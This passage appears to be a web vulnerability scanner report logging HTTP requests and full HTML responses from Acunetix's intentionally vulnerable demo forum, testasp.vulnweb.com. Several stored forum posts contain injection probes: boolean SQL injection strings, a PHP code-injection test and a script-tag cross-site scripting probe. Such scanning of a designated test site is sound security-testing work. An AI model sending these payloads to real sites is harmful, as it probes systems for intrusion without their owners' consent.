class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+627-627-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+627-627-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
Response Body - size: 4,144 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'.print(md5(31337)).'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4255 |
Response Body - size: 4,255 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum "acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555'"()&%<acx><ScRiPt >V7NV(9847)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4162 |
Response Body - size: 4,162 bytes. |
